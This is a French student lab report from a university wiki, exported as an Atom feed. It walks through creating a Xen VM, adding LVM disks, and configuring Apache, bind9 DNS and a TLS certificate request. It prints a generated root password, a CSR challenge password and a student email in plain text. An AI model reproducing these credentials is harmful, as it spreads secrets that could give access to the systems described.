<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="fr">
		<id>https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Pcoint</id>
		<title>Wiki d'activités IMA - Contributions de l’utilisateur [fr]</title>
		<link rel="self" type="application/atom+xml" href="https://wiki-ima.plil.fr/mediawiki//api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Pcoint"/>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php/Sp%C3%A9cial:Contributions/Pcoint"/>
		<updated>2026-05-13T23:15:42Z</updated>
		<subtitle>Contributions de l’utilisateur</subtitle>
		<generator>MediaWiki 1.29.2</generator>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51470</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51470"/>
				<updated>2019-11-29T14:52:56Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Informations importantes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 - CW&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|http://www.ima2a5-rex4ever.site/&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.ima2a5-rex4ever.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
Nos deux disques sont maintenant prêt, il ne reste plus qu'a les connecter avec la VM. Pour cela, il faut modifier le '''.cfg''' de nouveau.&lt;br /&gt;
&lt;br /&gt;
==== Modification du fichier de configuration ====&lt;br /&gt;
Retournons donc dans le fichier '''/etc/xen/ima2a5-rex4ever.cfg''' et dans la section disk modifier tel que : &lt;br /&gt;
&lt;br /&gt;
     disk    	= [&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/disk.img,xvda2,w',&lt;br /&gt;
                   	'file:/usr/local/xen/domains/ima2a5-rex4ever/swap.img,xvda1,w',               &lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-home,xvdb1,w',&lt;br /&gt;
                        'phy:/dev/virtual/ima2a5-rex4ever-var,xvdb2,w',&lt;br /&gt;
                  ]&lt;br /&gt;
&lt;br /&gt;
Pour prendre effet il faut redémarrer la VM à l'aide des commandes&lt;br /&gt;
    xl shutdown ima2a5-rex4ever&lt;br /&gt;
    xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
&lt;br /&gt;
==== Configuration pour forcer le montage à chaque démarrage de la VM ====&lt;br /&gt;
Il faut ensuite aller dans la VM dans '''/etc/fstab''' et ajouter &lt;br /&gt;
    /dev/xvdb1		/home		ext4		defaults				0		2&lt;br /&gt;
    #/dev/xvdb2		/var		ext4		defaults				0		2&lt;br /&gt;
&lt;br /&gt;
Ces deux lignes permettent d'assurer que les 2 disques /var et /home soient pris en compte au démarrage de la VM.('''ATTENTION POUR LE MOMENT BIEN LAISSER # DEVANT LA 2eme LIGNE''')&lt;br /&gt;
Relancer la machine comme précédemment expliqué et testé que le /home fonctionne.&lt;br /&gt;
Pour le /var c'est un peu plus compliqué comme manipulation et il faut faire EXTREMENT attention , une fausse manipulation peut tuer la machine.&lt;br /&gt;
    mount /dev/xvdb2 /mnt&lt;br /&gt;
    rm -rf /mnt/lock&lt;br /&gt;
    rm -rf /mnt/log&lt;br /&gt;
    rm -rf /mnt/run&lt;br /&gt;
    mv /var/* /mnt&lt;br /&gt;
    vi /etc/fstab&lt;br /&gt;
Maintenant decommentez la deuxième ligne que vous aviez ajouté précedemment. Puis il faut lancer la commande :&lt;br /&gt;
    umount /mnt    &lt;br /&gt;
    mount -a&lt;br /&gt;
A l'aide de la commande '''fdisk -l''' depuis la VM, on peut verifier que nos quatres disques sont bien montés.De même avec '''df''' on obtient bien dans la liste les lignes : &lt;br /&gt;
      Filesystem		1K-blocks	Used	Available	Use%	Mounted on&lt;br /&gt;
     udev		75004		0 	75004		0%	/dev&lt;br /&gt;
     tmpfs          	23824		76 	23748		1%	/run&lt;br /&gt;
     /dev/xvda2   	4062912		459920	3376896		12%	/&lt;br /&gt;
     tmpfs           	5120		0  	5120		0%	/run/lock&lt;br /&gt;
     tmpfs         	152500  	0	152500		0%	/run/shm&lt;br /&gt;
     /dev/xvdb1  	10321208	23028   9773892		1%	/home&lt;br /&gt;
     /dev/xvdb2  	10321208	71076   9725844		1%	/var&lt;br /&gt;
La machine est donc prête, on peut passer à l'installation des paquetages linux nécessaires&lt;br /&gt;
=== Mise en place de l'adresse statique ===&lt;br /&gt;
Précedemment nous avions mis l'adresse en DHCP or il est demandé d'avoir une adresse statique (pour notre groupe il s'agit de  ''' 193.48.57.163/28 ''' )&lt;br /&gt;
&lt;br /&gt;
=== Paquetage Linux ===&lt;br /&gt;
Pour commencer, on va tout d'abord mettre le système à jour via : &lt;br /&gt;
    sudo apt-get update&lt;br /&gt;
==== Paquetages nécessaires pour le SSH ====&lt;br /&gt;
'''OpenSSH''' est un ensemble d'outils libres pour établir des communications chiffrées, donc sécurisées, sur un réseau informatique grâce au protocole '''SSH''' (Secure SHell).&lt;br /&gt;
Il chiffre tout le trafic (mots de passe y compris), via une combinaison astucieuse de chiffrement symétrique et asymétrique. '''OpenSSH''' fournit également d'autres méthodes d'authentification alternatives au traditionnel mot de passe.&lt;br /&gt;
Comme son nom l'indique, OpenSSH est développé dans le cadre du projet '''OpenBSD'''.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Nom de la bibliothèque !! Descriptif !! Commande&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Client&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt-get install openssh-client&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 20%&amp;quot;|OpenSSh Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| Utilitaires de connexion SSH partie Server&lt;br /&gt;
|style=&amp;quot;width: 40%&amp;quot;| sudo apt install openssh-server&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
Dans notre cas, SSH est déjà présent sur la machine virtuelle.&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur Web Apache2 ====&lt;br /&gt;
Le logiciel libre Apache HTTP Server (Apache) est un serveur HTTP créé et maintenu au sein de la fondation Apache. C'est le serveur HTTP le plus populaire du World Wide Web. Il est distribué selon les termes de la licence Apache. &lt;br /&gt;
Pour l'installer, il faut taper la commande : &lt;br /&gt;
    apt install apache2&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires pour le serveur DNS/DNSSEC bind ====&lt;br /&gt;
Le service DNS (Domain Name System) est un service TCP/IP permettant la correspondance entre un nom de domaine qualifié (FQDN : Fully Qualified Domain Name) et une adresse IP. Ainsi, grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP.Un serveur qui héberge le service DNS est appelé &amp;quot;serveur de noms&amp;quot;. Ubuntu est livré par défaut avec BIND (Berkley Internet Naming Daemon), le serveur DNS le plus utilisé sur Internet. Pour installer bind9 :&lt;br /&gt;
    apt install bind9&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires le gestionnaire de RAID Logiciel Mdadm ====&lt;br /&gt;
Mdadm est une solution de RAID logiciel très fiable et très répandue dans la communauté Linux. Ce paquetage sera nécessaire pour la création d'un RAID5&lt;br /&gt;
   apt install mdadm&lt;br /&gt;
&lt;br /&gt;
==== Paquetages nécessaires la gestion d'authentification Wifi WPA-EAK ====&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTP ==&lt;br /&gt;
=== Achat d'un nom de domaine ===&lt;br /&gt;
Pour la réalisation de ce TP, nous avons dû acheter un nom de domaine via le site [https://www.gandi.net/fr Gandi.net] . On retiendra que notre nom de domaine est : [https://www.ima2a5-rex4ever.site rex4ever.site].&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage apache2 ===&lt;br /&gt;
Après avoir installé Apache2 sur la machine ( [https://wiki-ima.plil.fr/mediawiki//index.php/TP_sysres_IMA2a5_2019/2020_G3#Paquetages_n.C3.A9cessaires_pour_le_serveur_Web_Apache2 voir ici]), il faut le paramétrer correctement (je me suis servi de [https://doc.ubuntu-fr.org/apache2 ce site]).Pour cela, on commence configurer le '''.conf''' Pour cela, on le crée via la commande '''nano /etc/sites-available/ima2a5-rex4ever.site.conf''' et on renseigne alors dans le fichier les détails suivants :&lt;br /&gt;
    &amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
        ServerName ima2a5-rex4ever.site&lt;br /&gt;
        ServerAlias www.ima2a5-rex4ever.site&lt;br /&gt;
        DocumentRoot &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&lt;br /&gt;
        &amp;lt;Directory &amp;quot;/var/www/ima2a5-rex4ever&amp;quot;&amp;gt;&lt;br /&gt;
                Options +FollowSymLinks&lt;br /&gt;
                AllowOverride all&lt;br /&gt;
                Require all granted&lt;br /&gt;
        &amp;lt;/Directory&amp;gt;&lt;br /&gt;
        ErrorLog /var/log/apache2/error.ima2a5-rex4ever.site.log&lt;br /&gt;
        CustomLog /var/log/apache2/access.ima2a5-rex4ever.site.com.log combined&lt;br /&gt;
    &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
Maintenant qu'il est configuré, on peut déployer le site via : &lt;br /&gt;
    a2ensite ima2a5-rex4ever.site&lt;br /&gt;
Puis, on recharge la configuration de l'utilitaire Apache 2 :&lt;br /&gt;
    service apache2 reload&lt;br /&gt;
&lt;br /&gt;
=== Paramétrage du DNS ===&lt;br /&gt;
Le DNS (Domain Name Server) est un serveur qui permet de rattacher un nom à une IP et ainsi c'est lui qui permet de faire le lien entre le nom d'un site et son contenu&lt;br /&gt;
==== Glue Records sur Gandi ====&lt;br /&gt;
Le Glue Record permet de créer des alias et ainsi de lier des IP et à des noms.C'est fort pratique pour simplifier la configuration.Pour se faire il faut se rendre dans Domain , cliquer sur le nom de notre site , aller dans l'onglet Glue Records et cliquer sur ADD&lt;br /&gt;
   name : dns.ima2a5-rex4ever.site&lt;br /&gt;
   ip adresse(s) : 193.48.57.163&lt;br /&gt;
==== Affecter le DNS du coté de Gandi.net ====&lt;br /&gt;
Par défaut, les serveurs de noms (DNS) sont 3 serveurs de DNS Live Gandi, il faut ajouter les serveurs externes :&lt;br /&gt;
*ns6.gandi.net  '''217.70.177.40'''&lt;br /&gt;
*dns.ima2a5-rex4ever.site   '''193.48.57.163'''&lt;br /&gt;
'''Note:''' il faut compter 12 à 24 heures pour la propagation sur Internet.&lt;br /&gt;
==== Le paramétrage de bind9 ====&lt;br /&gt;
Le paramétrage repose sur la configuration de ses 3 fichiers :&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.options =====&lt;br /&gt;
Ce fichier permet de gérer les DNS authorisés (de manière générale) à récuperer des informations de notre site. On le modifie pour permettre au dns de gandi de récuperer les données :&lt;br /&gt;
&lt;br /&gt;
     options {&lt;br /&gt;
     &lt;br /&gt;
         // forwarders {&lt;br /&gt;
         //     0.0.0.0;&lt;br /&gt;
         // };&lt;br /&gt;
         // dnssec-validation auto;&lt;br /&gt;
         auth-nxdomain no;    # conform to RFC1035&lt;br /&gt;
         listen-on-v6 { any; };&lt;br /&gt;
         '''allow-transfer { &amp;quot;allowed_to_transfer&amp;quot;; };'''&lt;br /&gt;
     };&lt;br /&gt;
     &lt;br /&gt;
     '''acl &amp;quot;allowed_to_transfer&amp;quot; {'''&lt;br /&gt;
        ''' 217.70.177.40/32; // adresse IP du dns6.gandi.net'''&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== Le fichier /etc/bind/named.conf.local =====&lt;br /&gt;
Il faut maintenant déclarer à Bind9 le nom de notre fichier de configuration de DNS sous forme de zone , on le fait via ce fichier. On lui renseigne la zone : &lt;br /&gt;
    &lt;br /&gt;
     zone &amp;quot;ima2a5-rex4ever.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/db.ima2a5-rex4ever.site&amp;quot;;&lt;br /&gt;
     };&lt;br /&gt;
&lt;br /&gt;
===== le fichier /etc/bind/db.ima2a5-rex4ever.site=====&lt;br /&gt;
Enfin, il faut créer le fichier de configuration précedemment appelé : &lt;br /&gt;
&lt;br /&gt;
   ;&lt;br /&gt;
   ; BIND data file for local loopback interface&lt;br /&gt;
   ;&lt;br /&gt;
   $TTL    604800&lt;br /&gt;
   @       IN      SOA     dns.ima2a5-rex4ever.site. root@ima2a5-rex4ever.site. (  &amp;lt;= METTRE UNE ADRESSE BIDON , pas necessaire&lt;br /&gt;
                           21112019        ; Serial&lt;br /&gt;
                            604800         ; Refresh&lt;br /&gt;
                             86400         ; Retry&lt;br /&gt;
                           2419200         ; Expire&lt;br /&gt;
                            604800 )       ; Negative Cache TTL&lt;br /&gt;
   ;&lt;br /&gt;
   @       IN      NS      dns.ima2a5-rex4ever.site.  &amp;lt;= DN du site &lt;br /&gt;
   @       IN      NS      ns6.gandi.net.&amp;lt;= DNS de gandi&lt;br /&gt;
   dns     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE DNS&lt;br /&gt;
   www     IN      A       193.48.57.163 &amp;lt;= IP DE NOTRE SITE&lt;br /&gt;
&lt;br /&gt;
Après 5 minutes de cuisson et avoir relancé bind9, c'est prêt le site en http est accessible et visualisable! On peut acceder au site internet http://www.ima2a5-rex4ever.site !&lt;br /&gt;
&lt;br /&gt;
== Le Site Web : HTTPS ==&lt;br /&gt;
Le SSL (Secure Socket Layer) / TLS (Transport Layer Security) est le protocole de sécurité le plus répandu qui créé un canal sécurisé entre deux machines communiquant sur Internet ou un réseau interne. Dans notre société centrée sur un Internet vulnérable, le SSL est généralement utilisé lorsqu'un navigateur doit se connecter de manière sécurisée à un serveur web.&lt;br /&gt;
&lt;br /&gt;
=== Generation d'un certificat ===&lt;br /&gt;
&lt;br /&gt;
La première étape pour générer un certificat est de concevoir un jeu de 2 clefs qui sont un '''.key''' et un '''.csr''' &lt;br /&gt;
Pour obtenir ces deux fichiers, nous utilisons l'utilitaire '''OpenSSL'''.&lt;br /&gt;
      openssl req -nodes -newkey rsa:2048 -sha256 -keyout ima2a5-rex4ever.key -out ima2a5-rex4ever.csr &lt;br /&gt;
&lt;br /&gt;
'''Mais alors comment marche cette commande?'''&lt;br /&gt;
Après avoir lu le descriptif que l'on peut obtenir via [http://www.delafond.org/traducmanfr/man/man1/openssl.1.html man openssl], il en ressort que les arguments sont :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 85%;margin: auto;&amp;quot;&lt;br /&gt;
! Argument !! explication&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|req&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Gestion X.509 Certificate Signing Request (CSR). &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-nodes&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;| Pas de chiffrage sur la clef privée (option arbitraire no des)&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-newkey rsa:2048&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|demande de Génération d'une paire de clef RSA de 2048 bits et d'une demande de certificat.&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-keyout ima2a5-rex4ever.key&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre .key&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|-out ima2a5-rex4ever.csr &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|spécification du nom de notre demande de certificat .csr&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
Pour générer en bon éduforme notre demande,l'utilitaire a besoin des informations, voici ce que nous avons répondu:&lt;br /&gt;
&lt;br /&gt;
      Country Name (2 letter code) [AU]:'''FR'''&lt;br /&gt;
      State or Province Name (full name) [Some-State]:'''Nord'''&lt;br /&gt;
      Locality Name (eg, city) []:'''Lille'''&lt;br /&gt;
      Organization Name (eg, company) [Internet Widgits Pty Ltd]:'''Polytech Lille'''&lt;br /&gt;
      Organizational Unit Name (eg, section) []:'''IMA2A5'''&lt;br /&gt;
      Common Name (e.g. server FQDN or YOUR name) []:'''ima2a5-rex4ever.site'''&lt;br /&gt;
      Email Address []:'''pascal.coint@polytech-lille.net'''&lt;br /&gt;
      &lt;br /&gt;
      Please enter the following 'extra' attributes&lt;br /&gt;
      to be sent with your certificate request&lt;br /&gt;
      A challenge password []:'''glopglop!'''&lt;br /&gt;
      Optionnal informations :&lt;br /&gt;
&lt;br /&gt;
==== Affectation du certificat sur Gandi.net ====&lt;br /&gt;
Après avoir répondu , il génère alors 2 fichiers. Le '''.key''' est notre clef privée elle restera donc en notre unique possession. On partage avec gandhi (qui est également un générateur de certificat) notre '''.csr'''. Il va donc étudier la validité de notre domaine et le certifier ou non.&lt;br /&gt;
&lt;br /&gt;
''' Contenu de notre CSR'''&lt;br /&gt;
      -----BEGIN CERTIFICATE REQUEST-----&lt;br /&gt;
      MIIDBTCCAe0CAQAwgaUxCzAJBgNVBAYTAkZSMQ0wCwYDVQQIDAROb3JkMQ4wDAYD&lt;br /&gt;
      VQQHDAVMaWxsZTEXMBUGA1UECgwOUG9seXRlY2ggTGlsbGUxDzANBgNVBAsMBklN&lt;br /&gt;
      QTJBNTEdMBsGA1UEAwwUaW1hMmE1LXJleDRldmVyLnNpdGUxLjAsBgkqhkiG9w0B&lt;br /&gt;
